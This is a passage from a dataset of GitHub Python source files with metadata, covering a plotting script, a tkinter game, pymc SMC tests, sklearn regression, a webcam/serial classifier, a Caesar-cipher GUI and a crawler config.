range(len(CY_outer)):\n clusters[CY_outer_labels[v_idx]].append(list(CY_outer[v_idx]))\n#Save to a file\nwith open('./ClusteredOuterData.txt','w') as file:\n file.write('Cluster Sorted Outer Data: (note clusters not ordered)')\n for c_idx in range(len(clusters)-1):\n file.write('\\n\\nCluster '+str(c_idx+1)+' (centre: '+str(kmeans.cluster_centers_.flatten()[c_idx])+')\\n'+str(clusters[c_idx])+'\\n\\n##########')\n file.write('\\n\\nCluster '+str(len(clusters))+' (centre: '+str(kmeans.cluster_centers_.flatten()[-1])+')\\n'+str(clusters[-1]))\n ","repo_name":"edhirst/P4CY3ML","sub_path":"HodgePlots.py","file_name":"HodgePlots.py","file_ext":"py","file_size_in_byte":10040,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"43599742276","text":"from ShareChat.exception import ShareChatException\nfrom ShareChat.logger import logging\nimport os , sys\n\nclass ChatMessage:\n\n def filter_message_address(self,RecieveDat):\n \"\"\"Return the message, ip address and port number from the received data.\"\"\"\n try:\n logging.info('filtering the received data')\n message = RecieveDat[0]\n if message[0:1] != b'2':\n message = message.decode('ascii')\n address = RecieveDat[1]\n ip_address = address[0]\n port_no = address[1]\n 
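# the message stays as raw bytes in this branch (it begins with b'2'); only the sender address is unpacked\n 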
logging.info(f\"successfully filtered received data from {ip_address}\")\n return message , ip_address , port_no\n else:\n address = RecieveDat[1]\n ip_address = address[0]\n port_no = address[1]\n logging.info(f\"successfully filtered received data from {ip_address}\")\n return message , ip_address , port_no\n\n except Exception as e:\n raise ShareChatException(e,sys)","repo_name":"Ranjit-Singh-786/Ai_ShareChat","sub_path":"ShareChat/component/chat_message.py","file_name":"chat_message.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29682699018","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\n\nargs1 = {'astar': {'color': 'grey'},\n 'beam5': {'color': 'deeppink'},\n 'beam10': {'color': 'b'},\n 'beam20': {'color': 'forestgreen'},\n 'beam40': {'color': 'darkorange'},\n 'beam80': {'color': 'cyan'},\n 'hungarian': {'color': 'deepskyblue'},\n 'vj': {'color': 'darkcyan'},\n 'graph2vec': {'color': 'darkcyan'},\n 'siamese': {'color': 'red'},\n 'transductive': {'color': 'red'}}\n\n\nargs2 = {'astar': {'marker': '*', 'facecolors': 'none', 'edgecolors': 'grey'},\n 'beam5': {'marker': '|', 'facecolors': 'deeppink'},\n 'beam10': {'marker': '_', 'facecolors': 'b'},\n 'beam20': {'marker': 'D', 'facecolors': 'none',\n 'edgecolors': 'forestgreen'},\n 'beam40': {'marker': '^', 'facecolors': 'none',\n 'edgecolors': 'darkorange'},\n 'beam80': {'marker': 's', 'facecolors': 'none', 'edgecolors': 'cyan'},\n 'hungarian': {'marker': 'X', 'facecolors': 'none',\n 'edgecolors': 'deepskyblue'},\n 'vj': {'marker': 'h', 'facecolors': 'none',\n 'edgecolors': 'darkcyan'},\n 'graph2vec': {'marker': 'h', 'facecolors': 'none',\n 'edgecolors': 'darkcyan'},\n 'siamese': {'marker': 'P',\n 'facecolors': 'none', 'edgecolors': 'red'},\n 'transductive': {'marker': 'P',\n 'facecolors': 'none', 'edgecolors': 'red'}\n }\n\n\nTYPE_COLOR_MAP = {\n 'C': '#ff6666',\n 'O': 'lightskyblue',\n 'N': 'yellowgreen',\n 'movie': '#ff6666',\n 'tvSeries': '#ff6666',\n 'actor': 'lightskyblue',\n 'actress': '#ffb3e6',\n 'director': 'yellowgreen',\n 'composer': '#c2c2f0',\n 'producer': '#ffcc99',\n 'cinematographer': 'gold'}\n\n\nfont2 = {'family': 'Times New Roman',\n 'weight': 'normal',\n 'size': 30, }\n\n\nif __name__ == '__main__':\n # aids Beam80 79.604 Beam1 14.222 Beam2\n # linux Beam80 30.788 Beam1 11.358 Beam2\n # imdb Beam80 139.266 Beam1 0 Beam2\n # name_list = ['A*', 'Beam80', 'Beam\\n1', 'Hung\\narian', 'VJ', 'Avg',\n # 'GCN\\nMean\\nPool', 'GCN\\nMax\\nPool', 'Att\\nDeg',\n # 'Att\\nCout', 'Att\\nTrans\\nCout', 'SimGNN']\n name_list = ['A*', 'Beam', 'Hung\\narian', 'VJ', 'SimpleMean',\n 'HierarchicalMean', 'HierarchicalMax', 'AttDegree',\n 'AttGlobalContext', 'AttLearnableGC', 'SimGNN']\n num_list_aids = [5540.527, 19.026, 5.726, 8.801, 1.728, 2.139, 2.131, 1.586, 1.678, 1.681, 2.549]\n num_list_linux = [534.505, 7.923, 3.684, 4.735, 1.444, 2.185, 2.166, 1.929, 1.964, 2.084, 2.517]\n num_list_imdb = [0, 139.266, 120.349, 135.264, 1.371, 2.764, 2.865, 2.069, 2.227, 2.335, 2.997]\n color_list = ['grey', 'deeppink', 'blue', 'forestgreen', 'darkorange',\n 'cyan','deepskyblue', 'darkcyan', 'darkcyan', 'red']\n index = np.arange(len(name_list))\n bar_width = 0.25\n fig, ax = plt.subplots(figsize=(20, 12))\n plt.bar(index, num_list_aids, width=bar_width, align=\"center\",\n color='white', label='AIDS', edgecolor='k', hatch=\"///\", lw=3)\n # for a, b in zip(name_list, 
num_list_aids):\n # plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=25)\n\n plt.bar(index + bar_width, num_list_linux, width=bar_width, align=\"center\",\n color='white', label='LINUX', edgecolor='k', hatch=\"\\\\\\\\\", lw=3)\n # for a, b in zip(name_list, num_list_linux):\n # plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=25)\n\n plt.bar(index + 2 * bar_width, num_list_imdb, width=bar_width, align=\"center\",\n color='white', label='IMDB', edgecolor='k', hatch='', lw=3)\n # for a, b in zip(name_list, num_list_imdb):\n # if b != 0:\n # plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=25)\n plt.xticks(index + 0.25, ('A*', 'Beam', 'Hung\\narian', 'VJ', 'Simple\\nMean',\n 'Hierar\\nchical\\nMean', 'Hierar\\nchical\\nMax', 'Att\\nDegree',\n 'Att\\nGlobal\\nContext', 'Att\\nLearn-\\nableGC', 'SimGNN'), fontsize=28)\n plt.yticks(fontsize=30)\n plt.ylabel(\"time(msec)\", font2)\n plt.yscale(\"log\")\n plt.legend(loc='best', prop={'size': 30})\n plt.grid(which=u'major', axis=u'y', linestyle='--')\n plt.tight_layout()\n plt.savefig(\"time.png\")\n plt.savefig(\"time.eps\")\n plt.close()\n # plt.show()\n\n\n\n\n\n\n","repo_name":"yunshengb/SimGNN","sub_path":"src/data_pre_post_process/time_hist_three.py","file_name":"time_hist_three.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"67"} +{"seq_id":"73941163733","text":"\nfrom tkinter import*\n\nclass main:\n def __init__(self, master):\n #Local Variables\n terrainx=0\n terrainy=screenh/1.5\n terrainx1=app.winfo_screenwidth()\n terrainy2=app.winfo_screenheight()\n self.gravity=10\n #Drawings\n self.canvas=Canvas(width=screenw, height=screenh)\n self.canvas.pack()\n \n self.player=self.canvas.create_rectangle(5,5,20,50,fill=\"green\")\n self.monster=self.canvas.create_rectangle(405,5,420,50,fill=\"red\")\n self.terrain=self.canvas.create_rectangle(terrainx,terrainy,terrainx1,terrainy2,fill=\"black\")\n self.plataform=self.canvas.create_rectangle(terrainx+200,terrainy-30,terrainx+250,terrainy-20,fill=\"black\")\n self.plataform_1=self.canvas.create_rectangle(terrainx+300,terrainy-50,terrainx+350,terrainy-40,fill=\"black\")\n\n self.update_player()\n \n \n def update_player(self):\n #Boundaries to make collision based on border of the drawnings\n self.player_bbox=self.canvas.bbox(self.player)\n self.terrain_bbox=self.canvas.bbox(self.terrain)\n self.plataform_bbox=self.canvas.bbox(self.plataform)\n self.plataform_1_bbox=self.canvas.bbox(self.plataform_1)\n #Gravity and velocity control\n velocity=0\n velocity += self.gravity\n \n #Method to stop player if the down border of player encounter top border of terrain\n if self.player_bbox[3] >= self.terrain_bbox[1]:\n velocity=0\n \n elif self.player_bbox[3] >= self.plataform_bbox[1]:\n if self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] :\n velocity=0\n \n elif self.player_bbox[3] >= self.plataform_1_bbox[1]:\n if self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2] :\n velocity=0\n \n #Move the player based on gravity to make player come back to plataform\n self.canvas.move(self.player, 0, velocity)\n \n #Keep calling the update_player Function to make things *WORK*\n self.canvas.after(100, self.update_player)\n\n #Method to move player as the correspondent key is pressed\n def move_player(self, event):\n\n key = event.keysym\n #Move to left\n if key == \"Left\":\n #\"Trying\" to 
delimit the extent it can move, in this case, the border of screen\n            if self.player_bbox[0] >= 15:\n                if self.player_bbox[3] >= self.terrain_bbox[1] or self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] or self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2]:\n                    self.canvas.move(self.player, -5,0)\n                    print(\"Left\")\n                    app.update()\n            else:\n                print(\"Cant Move\")\n        #Move Up(Aka:Jump)\n        if key == \"Up\":\n            #Only allow \"jumping\" if the player is standing on the terrain or a platform\n            if self.player_bbox[3] >= self.terrain_bbox[1] or self.player_bbox[3] >= self.plataform_bbox[1] and self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] or self.player_bbox[3] >= self.plataform_1_bbox[1] and self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2]:\n                self.canvas.move(self.player, 0,-50)\n                print(\"Up\")\n                self.canvas.after(150)\n            else:\n                print(\"Cant Move\")\n\n        #Move Right\n        elif key == \"Right\":\n            #\"Trying\" to delimit the extent it can move, in this case, the border of screen\n            if self.player_bbox[2] <= screenw-15:\n                if self.player_bbox[3] >= self.terrain_bbox[1] or self.player_bbox[2] >= self.plataform_bbox[0] and self.player_bbox[0] <= self.plataform_bbox[2] or self.player_bbox[2] >= self.plataform_1_bbox[0] and self.player_bbox[0] <= self.plataform_1_bbox[2]:\n                    self.canvas.move(self.player, 5,0)\n                    print(\"Right\")\n                    app.update()\n            else:\n                print(\"Cant Move\")\n        \n\n#Main Program\napp=Tk()\n\n#Global Variables\nscreenw=app.winfo_screenwidth()/2\nscreenh=app.winfo_screenheight()/2\n\n#Screen Settings\napp.geometry(\"%dx%d+%d+%d\"%(screenw,screenh,screenw/2,screenh/2))\napp.resizable(0,0)\n\n#Call-out\nroot=main(app)\n\nroot.canvas.bind_all(\"<Key>\",root.move_player)\n\n\n\n\n\n#Main Loop\napp.mainloop()\n","repo_name":"gbyuri/Project-RPG-Python","sub_path":"moretesting.py","file_name":"moretesting.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"16748832084","text":"import jax\nimport numpy as np\nimport pymc as pm\nimport pytensor.tensor as pt\nimport pytest\nimport scipy\nfrom numpy import dtype\nfrom xarray.core.utils import Frozen\n\nfrom pymc_experimental.inference.smc.sampling import (\n    arviz_from_particles,\n    blackjax_particles_from_pymc_population,\n    get_jaxified_loglikelihood,\n    get_jaxified_logprior,\n    sample_smc_blackjax,\n)\n\n\ndef two_gaussians_model():\n    n = 4\n    mu1 = np.ones(n) * 0.5\n    mu2 = -mu1\n\n    stdev = 0.1\n    sigma = np.power(stdev, 2) * np.eye(n)\n    isigma = np.linalg.inv(sigma)\n    dsigma = np.linalg.det(sigma)\n\n    w1 = stdev\n    w2 = 1 - stdev\n\n    def two_gaussians(x):\n        \"\"\"\n        Mixture of gaussians likelihood\n        \"\"\"\n        log_like1 = (\n            -0.5 * n * pt.log(2 * np.pi)\n            - 0.5 * pt.log(dsigma)\n            - 0.5 * (x - mu1).T.dot(isigma).dot(x - mu1)\n        )\n        log_like2 = (\n            -0.5 * n * pt.log(2 * np.pi)\n            - 0.5 * pt.log(dsigma)\n            - 0.5 * (x - mu2).T.dot(isigma).dot(x - mu2)\n        )\n        return pt.log(w1 * pt.exp(log_like1) + w2 * pt.exp(log_like2))\n\n    with pm.Model() as m:\n        X = pm.Uniform(\"X\", lower=-2, upper=2.0, shape=n)\n        llk = pm.Potential(\"muh\", two_gaussians(X))\n\n    return m, mu1\n\n\ndef fast_model():\n    with pm.Model() as m:\n        x = pm.Normal(\"x\", 0, 1)\n        y = pm.Normal(\"y\", x, 1, observed=0)\n    return m\n\n\n@pytest.mark.parametrize(\n    \"kernel, check_for_integration_steps, inner_kernel_params\",\n    [\n        (\"HMC\", True, {\"step_size\": 0.1, 
\"integration_steps\": 11}),\n (\"NUTS\", False, {\"step_size\": 0.1}),\n ],\n)\ndef test_sample_smc_blackjax(kernel, check_for_integration_steps, inner_kernel_params):\n \"\"\"\n When running the two gaussians model\n with BlackJax SMC, we sample them correctly,\n the shape of a posterior variable is (1, particles, dimension)\n and the inference_data has the right attributes.\n\n \"\"\"\n model, muref = two_gaussians_model()\n iterations_to_diagnose = 2\n n_particles = 1000\n with model:\n inference_data = sample_smc_blackjax(\n n_particles=n_particles,\n kernel=kernel,\n inner_kernel_params=inner_kernel_params,\n iterations_to_diagnose=iterations_to_diagnose,\n )\n\n x = inference_data.posterior[\"X\"]\n\n assert x.to_numpy().shape == (1, n_particles, 4)\n mu1d = np.abs(x).mean(axis=0).mean(axis=0)\n np.testing.assert_allclose(muref, mu1d, rtol=0.0, atol=0.03)\n\n for attribute, value in [\n (\"particles\", n_particles),\n (\"step_size\", 0.1),\n (\"num_mcmc_steps\", 10),\n (\"iterations_to_diagnose\", iterations_to_diagnose),\n (\"sampler\", f\"Blackjax SMC with {kernel} kernel\"),\n ]:\n assert inference_data.posterior.attrs[attribute] == value\n\n for diagnostic in [\"lambda_evolution\", \"log_likelihood_increments\"]:\n assert inference_data.posterior.attrs[diagnostic].shape == (iterations_to_diagnose,)\n\n for diagnostic in [\"ancestors_evolution\", \"weights_evolution\"]:\n assert inference_data.posterior.attrs[diagnostic].shape == (\n iterations_to_diagnose,\n n_particles,\n )\n\n for attribute in [\"running_time_seconds\", \"iterations\"]:\n assert attribute in inference_data.posterior.attrs\n\n if check_for_integration_steps:\n assert inference_data.posterior.attrs[\"integration_steps\"] == 11\n\n\ndef test_blackjax_particles_from_pymc_population_univariate():\n model = fast_model()\n population = {\"x\": np.array([2, 3, 4])}\n blackjax_particles = blackjax_particles_from_pymc_population(model, population)\n jax.tree_map(np.testing.assert_allclose, blackjax_particles, [np.array([[2], [3], [4]])])\n\n\ndef test_blackjax_particles_from_pymc_population_multivariate():\n with pm.Model() as model:\n x = pm.Normal(\"x\", 0, 1)\n z = pm.Normal(\"z\", 0, 1)\n y = pm.Normal(\"y\", x + z, 1, observed=0)\n\n population = {\"x\": np.array([0.34614613, 1.09163261, -0.44526825]), \"z\": np.array([1, 2, 3])}\n blackjax_particles = blackjax_particles_from_pymc_population(model, population)\n jax.tree_map(\n np.testing.assert_allclose,\n blackjax_particles,\n [np.array([[0.34614613], [1.09163261], [-0.44526825]]), np.array([[1], [2], [3]])],\n )\n\n\ndef simple_multivariable_model():\n \"\"\"\n A simple model that has a multivariate variable,\n a has more than one variable (multivariable)\n \"\"\"\n with pm.Model() as model:\n x = pm.Normal(\"x\", 0, 1, shape=2)\n z = pm.Normal(\"z\", 0, 1)\n y = pm.Normal(\"y\", z, 1, observed=0)\n return model\n\n\ndef test_blackjax_particles_from_pymc_population_multivariable():\n model = simple_multivariable_model()\n population = {\"x\": np.array([[2, 3], [5, 6], [7, 9]]), \"z\": np.array([11, 12, 13])}\n blackjax_particles = blackjax_particles_from_pymc_population(model, population)\n\n jax.tree_map(\n np.testing.assert_allclose,\n blackjax_particles,\n [np.array([[2, 3], [5, 6], [7, 9]]), np.array([[11], [12], [13]])],\n )\n\n\ndef test_arviz_from_particles():\n model = simple_multivariable_model()\n particles = [np.array([[2, 3], [5, 6], [7, 9]]), np.array([[11], [12], [13]])]\n with model:\n inference_data = arviz_from_particles(model, particles)\n\n 
assert inference_data.posterior.dims == Frozen({\"chain\": 1, \"draw\": 3, \"x_dim_0\": 2})\n assert inference_data.posterior.data_vars.dtypes == Frozen(\n {\"x\": dtype(\"float64\"), \"z\": dtype(\"float64\")}\n )\n\n\ndef test_get_jaxified_logprior():\n \"\"\"\n Given a model with a Normal prior\n for a RV, the jaxified logprior\n indeed calculates that number,\n and can be jax.vmap'ed\n \"\"\"\n logprior = get_jaxified_logprior(fast_model())\n for point in [-0.5, 0.0, 0.5]:\n jax.tree_map(\n np.testing.assert_allclose,\n jax.vmap(logprior)([np.array([point])]),\n np.log(scipy.stats.norm(0, 1).pdf(point)),\n )\n\n\ndef test_get_jaxified_loglikelihood():\n \"\"\"\n Given a model with a Normal Likelihood, a single observation\n 0 and std=1, the only free parameter of that function is the mean.\n When computing the logliklikelihood\n Then the function can be jax.vmap'ed, and the calculation matches the likelihood.\n \"\"\"\n loglikelihood = get_jaxified_loglikelihood(fast_model())\n for point in [-0.5, 0.0, 0.5]:\n jax.tree_map(\n np.testing.assert_allclose,\n jax.vmap(loglikelihood)([np.array([point])]),\n np.log(scipy.stats.norm(point, 1).pdf(0)),\n )\n","repo_name":"pymc-devs/pymc-experimental","sub_path":"pymc_experimental/tests/test_blackjax_smc.py","file_name":"test_blackjax_smc.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"67"} +{"seq_id":"11708425752","text":"from rest_framework import serializers\n\nfrom api_orders.models import OrderItem\nfrom api_products.serializers import ProductSerializer\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = OrderItem\n fields = ['product', 'quantity', 'price']\n\n\nclass MyOrderItemSerializer(serializers.ModelSerializer):\n product = ProductSerializer()\n\n class Meta:\n model = OrderItem\n fields = ['product', 'quantity', 'price']\n","repo_name":"KhungLongCon12/KLC_Shop","sub_path":"BackEnd/api_orders/serializers/OrderProduct.py","file_name":"OrderProduct.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11803692100","text":"from keras.models import load_model # TensorFlow is required for Keras to work\nimport cv2 # Install opencv-python\nimport numpy as np\nimport serial\nimport serial\nimport time\n\n# Disable scientific notation for clarity\nnp.set_printoptions(suppress=True)\n\n# Load the model\nmodel = load_model(\"keras_model.h5\", compile=False)\n\n# Load the labels\nclass_names = open(\"labels.txt\", \"r\").readlines()\n\n# CAMERA can be 0 or 1 based on default camera of your computer\ncamera = cv2.VideoCapture(0)\n\nser = serial.Serial(\"/dev/ttyUSB0\", 9600)\ntime.sleep(3)\n\nbuf = \"\"\n\nscore = 0\n\nactive = False\nwhile True:\n if ser.in_waiting:\n char = ser.read(1)\n print(char)\n if char == b\"b\":\n active = True\n ser.readline()\n elif char == b\"q\":\n active = False\n ser.readline()\n time.sleep(5)\n else:\n score = int((char + ser.readline()).decode(\"utf-8\"))\n \n # Grab the webcamera's image.\n ret, image = camera.read()\n\n # Resize the raw image into (224-height,224-width) pixels\n image = cv2.resize(image, (224, 224), interpolation=cv2.INTER_AREA)\n\n imgwtext = cv2.putText(image, f\"{score}\", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 5)\n\n # Show the image in a window\n cv2.imshow(\"Webcam Image\", imgwtext)\n\n # Make the image a numpy array and reshape it to the models 
input shape.\n image = np.asarray(image, dtype=np.float32).reshape(1, 224, 224, 3)\n\n # Normalize the image array\n image = (image / 127.5) - 1\n\n # Predicts the model\n prediction = model.predict(image)\n index = np.argmax(prediction)\n class_name = class_names[index]\n confidence_score = prediction[0][index]\n\n # Print prediction and confidence score\n # print(\"Class:\", class_name[2:], end=\"\")\n # print(\"Confidence Score:\", str(np.round(confidence_score * 100))[:-2], \"%\")\n if class_name == \"0 Class 1\\n\" and not active:\n print(\"asdf\")\n ser.write(b\"a\\n\")\n\n # Listen to the keyboard for presses.\n keyboard_input = cv2.waitKey(1)\n\n # 27 is the ASCII for the esc key on your keyboard.\n if keyboard_input == 27:\n break\n\ncamera.release()\ncv2.destroyAllWindows()\n\nser.close()\n","repo_name":"hyc3573/swchk","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25039172596","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n\n\nclass GaussianDiag:\n Log2PI = float(np.log(2 * np.pi))\n\n @staticmethod\n def likelihood(mean, logs, x):\n \"\"\"\n lnL = -1/2 * { ln|Var| + ((X - Mu)^T)(Var^-1)(X - Mu) + kln(2*PI) }\n k = 1 (Independent)\n Var = logs ** 2\n \"\"\"\n if mean is None and logs is None:\n return -0.5 * (x ** 2 + GaussianDiag.Log2PI)\n else:\n return -0.5 * (logs * 2. + ((x - mean) ** 2) / torch.exp(logs * 2.) + GaussianDiag.Log2PI)\n\n @staticmethod\n def logp(mean, logs, x):\n likelihood = GaussianDiag.likelihood(mean, logs, x)\n return likelihood.view(likelihood.size(0), -1).sum(dim=-1)\n\n @staticmethod\n def sample(mean, logs, eps_std=None):\n eps_std = eps_std or 1\n eps = torch.normal(mean=torch.zeros_like(mean), std=torch.ones_like(logs) * eps_std)\n return mean + torch.exp(logs) * eps\n\n @staticmethod\n def sample_eps(shape, eps_std=0.7, seed=None):\n if seed is not None:\n torch.manual_seed(seed)\n eps = torch.normal(mean=torch.zeros(shape), std=torch.ones(shape) * eps_std)\n return eps","repo_name":"branchCode/FlowFill","sub_path":"s1/codes/models/modules/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72918249172","text":"from tkinter import *\nfrom tkinter import ttk\n\nimport descripta\nimport encripta\n\nroot = Tk()\nroot.title(\"Crypto descktop n2\")\nroot.geometry(\"600x100\")\n\nfrm = ttk.Frame(root, padding=5)\nfrm.grid(row=10, column=1)\n\n\ndef encryptMessage():\n texto = encriptar_input.get()\n\n print(\"TESTE: \", texto)\n\n ct = encripta.encriptar_cesar(texto, 4)\n encriptado_input.insert(0, ct)\n\n\ndef decryptMessage():\n texto_cifrado = descriptar_input.get()\n\n resultado_descript = descripta.decriptar_cesar(texto_cifrado, 4)\n descriptado_input.insert(0, resultado_descript)\n\n\n\nLabel(frm, text='Texto a encriptar: ').grid(row=10, column=1)\nencriptar_input = Entry(root)\nencriptar_input.grid(row=10, column=2)\n\nLabel(root, text='Texto encriptado: ').grid(row=11, column=1)\nencriptado_input = Entry(root)\nencriptado_input.grid(row=11, column=2)\n\nencriptar_botao = Button(root, text = \"Encriptar\", bg =\"red\", fg =\"white\", command=encryptMessage)\nencriptar_botao.grid(row=13, column=2)\n\n\nLabel(root, text='Texto cifrado: ').grid(row=10, column=10)\ndescriptar_input = Entry(root)\ndescriptar_input.grid(row=10, 
column=11)\n\n\nLabel(root, text='Texto descriptado: ').grid(row=11, column=10)\ndescriptado_input = Entry(root)\ndescriptado_input.grid(row=11, column=11)\n\ndescriptar_botao = Button(root, text = \"Descriptar\", bg =\"green\", fg =\"white\", command=decryptMessage)\ndescriptar_botao.grid(row=13, column=11)\n\n\nroot.mainloop()\n","repo_name":"danielsimonebeira/crypto-desktop","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35961121436","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures \r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.feature_selection import VarianceThreshold\r\nfrom sklearn.linear_model import Lasso, Ridge\r\nfrom sklearn.impute import KNNImputer\r\nfrom sklearn.ensemble import GradientBoostingRegressor, IsolationForest, RandomForestRegressor\r\nfrom sklearn.linear_model import ElasticNetCV\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.experimental import enable_iterative_imputer\r\nfrom sklearn.impute import IterativeImputer\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.decomposition import PCA\r\nimport pandas as pd\r\nimport sklearn\r\n\r\n#load the dataset\r\nX_train = pd.read_csv('X_train.csv').drop(['id'], axis=1)\r\ny_train = pd.read_csv('y_train.csv')[\"y\"]\r\nX_test = pd.read_csv('X_test.csv').drop(['id'], axis=1)\r\n#ds1d = X_train.describe()\r\n#Use IQR to detect the outliers \r\n\r\n#drop the useless featrues\r\nsel=VarianceThreshold()\r\nX_train = sel.fit_transform(X_train)\r\nX_test = sel.transform(X_test)\r\n\r\n\r\n\r\n#imputation of the missing value(KNN imputer)\r\nimp = KNNImputer(n_neighbors=5)\r\nX_train_imputed = imp.fit_transform(X_train)\r\nX_test_imputed = imp.fit_transform(X_test)\r\n\r\n# standardization\r\nscaler = StandardScaler()\r\nX_train_st = scaler.fit_transform(X_train_imputed)\r\nX_test_st = scaler.transform(X_test_imputed)\r\n\r\n## for feature selection \r\nbest_alpha = 0.388\r\nclf = Lasso(alpha=best_alpha)\r\nclf.fit(X_train_st,y_train)\r\nweights = clf.coef_\r\nimportant_features = []\r\nfor i in range(len(weights)):\r\n if weights[i] != 0:\r\n important_features.append(i)\r\nprint(\"Number of important features for our model:\", len(important_features))\r\nprint(\"Indexes of important features for our model:\", important_features)\r\n\r\n#load the dataset again\r\nX_train = pd.read_csv('X_train.csv').drop(['id'], axis=1)\r\ny_train = pd.read_csv('y_train.csv')[\"y\"]\r\nX_test = pd.read_csv('X_test.csv').drop(['id'], axis=1)\r\n\r\n#drop the useless featrues\r\nsel=VarianceThreshold()\r\nX_train = sel.fit_transform(X_train)\r\nX_test = sel.transform(X_test)\r\nX_train = X_train[:,important_features]\r\nX_test = X_test[:,important_features]\r\n \r\n\r\n#imputation of the missing value(iterative)\r\nimp = KNNImputer(n_neighbors=5)\r\nX_train_imputed = imp.fit_transform(X_train)\r\nX_test_imputed = imp.fit_transform(X_test)\r\n\r\n#isolisation forest\r\nclf = IsolationForest(contamination=0.03)\r\npred = clf.fit_predict(X_train_imputed)\r\nindex_outliers = []\r\nfor i in range(len(pred)):\r\n if pred[i] == -1:\r\n index_outliers.append(i)\r\nX_train_imputed = np.delete(X_train_imputed, index_outliers, axis=0)\r\n\r\ny_train = np.delete(y_train.values, index_outliers, axis=0)\r\n\r\n\r\n#outliers\r\nds_train = pd.DataFrame(X_train).describe()\r\nds_test = 
pd.DataFrame(X_test).describe()\r\nX_train = pd.DataFrame(X_train)\r\nX_test = pd.DataFrame(X_test)\r\nfor index, row in ds_train.items():\r\n    index_outliers = []\r\n    IQR = row[\"75%\"] - row[\"25%\"]\r\n    lower_limit = row[\"25%\"] - 1.5*IQR\r\n    upper_limit = row[\"75%\"] + 1.5*IQR\r\n    X_train[index][(X_train[index]<=lower_limit) | (X_train[index]>=upper_limit)] = X_train[index].median()\r\nfor index, row in ds_test.items():\r\n    index_outliers = []\r\n    IQR = row[\"75%\"] - row[\"25%\"]\r\n    lower_limit = row[\"25%\"] - 1.5*IQR\r\n    upper_limit = row[\"75%\"] + 1.5*IQR\r\n    X_test[index][(X_test[index]<=lower_limit) | (X_test[index]>=upper_limit)] = X_test[index].median()\r\n\r\n# standardization\r\nscaler = StandardScaler()\r\nX_train_st = scaler.fit_transform(X_train_imputed)\r\nX_test_st = scaler.transform(X_test_imputed)\r\n\r\n#score test (Random Forest Regressor)\r\nregressor = RandomForestRegressor()\r\nscores = cross_val_score(regressor, X_train_st, y_train, cv=5, scoring= 'r2')\r\nprint(scores.mean(),scores.std())\r\n\r\nregressor.fit(X_train_st, y_train)\r\ny_pred = regressor.predict(X_test_st)\r\n\r\ny_pred = pd.DataFrame(y_pred)\r\ny_pred.to_csv(\"y_predict.csv\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Yinghzzz/document","sub_path":"Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"41116638246","text":"\n#Government procurement\nCRAWL_GUOJIAGAOXINQU_TASKS = {\n    'name':'guojiagaoxinqu',\n    'source_url':'',\n    'task_queue':'wangban:guojiagaoxinqu:an_work_urls',\n    'task_check':'wangban:guojiagaoxinqu:an_url_check',\n    'task_ajax':'wangban:guojiagaoxinqu:an_url_ajax',\n    'html_type':'static',\n    'tasks':[\n    {\n            \"an_sub\": \"NONE\",\n            \"an_major\": \"工程建设\",\n            \"an_type\": \"资格预审结果公示\",\n            \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gxzgysgs/index.jhtml?areaCode=330231\"\n        },\n        {\n            \"an_sub\": \"NONE\",\n            \"an_major\": \"工程建设\",\n            \"an_type\": \"中标候选人公示\",\n            \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszbhxrgs/index.jhtml?areaCode=330231\"\n        },\n        {\n            \"an_sub\": \"NONE\",\n            \"an_major\": \"工程建设\",\n            \"an_type\": \"招标公告\",\n            \"an_sub_url\": \"http://gaoxin.bidding.gov.cn/gcjszbgg/index.jhtml?areaCode=330231\"\n        },\n        {\n            \"an_sub\": \"NONE\",\n            \"an_major\": \"工程建设\",\n            